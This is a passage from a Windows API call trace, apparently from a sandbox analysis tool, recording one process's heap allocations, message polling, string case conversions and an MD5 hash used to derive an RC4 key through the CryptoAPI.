lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.699] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.699] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.699] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.699] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.700] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.700] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.700] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.700] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.700] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.700] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.700] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.701] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.701] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.701] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.701] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.701] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.701] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.702] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.702] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.702] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.702] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.702] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.704] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.704] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.704] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.705] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0190.705] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.705] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.705] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.706] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.706] CryptHashData (hHash=0xaa5860, pbData=0x24b1bc8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0190.707] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.707] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.708] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.708] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.708] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.709] CryptDeriveKey (in: hProv=0xaa3868, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.709] 